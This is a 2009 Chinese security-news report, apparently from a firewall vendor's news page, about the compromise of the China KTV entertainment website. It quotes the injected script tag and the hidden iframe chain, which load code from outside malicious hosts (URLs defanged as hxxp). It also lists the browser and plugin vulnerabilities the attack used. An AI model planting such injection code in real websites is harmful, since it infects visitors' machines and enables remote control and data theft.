English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 业界动态 >> 中国KTV娱乐网被挂马 用户面临感染威胁

 

中国KTV娱乐网被挂马 用户面临感染威胁

威盾防火墙 2009-04-14

 
中国KTV娱乐网挂马事件(hxxp://www.163ktv.com/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

该网站问题代码:

<script src=hxxp://3b3.org/c.js></script>

hxxp://3b3.org/c.js问题框架代码:

 

<iframe src=hxxp://www.sdahidsahidsahi.cn/sina/a100.htm width=0 height=0></iframe>

hxxp://www.sdahidsahidsahi.cn/sina/a100.htm问题框架代码:

 

 

<iframe src="au.htm" width=111 height=0 border=0></iframe>

hxxp://www.sdahidsahidsahi.cn/sina/au.htm问题框架代码

 

解密后可知,该挂马网页通过以下几个漏洞传播:

MS06-014漏洞

MS08-041漏洞

MS09-002漏洞

暴风影音播放器MPS.StormPlayer漏洞

联众世界GLIEDown2.dll Active控件溢出漏洞

RealPlayer播放器IERPCtl.IERPCtl.1漏洞

Adobe Flash Player SWF文件漏洞

(威盾新闻中心转载)


相关内容: 最新内容:
计世西南网、中国地质大学等部分页面被挂马[2009-04-08]
黑客盯上公益事业 洛阳中心血站被挂马[2009-04-02]
日媒称日政府网站被黑 网页出现五星红旗[2009-04-14]
web安全:你的Web系统有多少安全漏洞[2009-04-13]
保护网络服务器安全 禁止网站被盗链[2009-04-13]
温州论坛被黑?[2009-04-13]
美17岁青少年承认Twitter蠕虫是其杰作[2009-04-13]
多个博客、SNS网站被挂马 疑为同一组织所为[2009-04-13]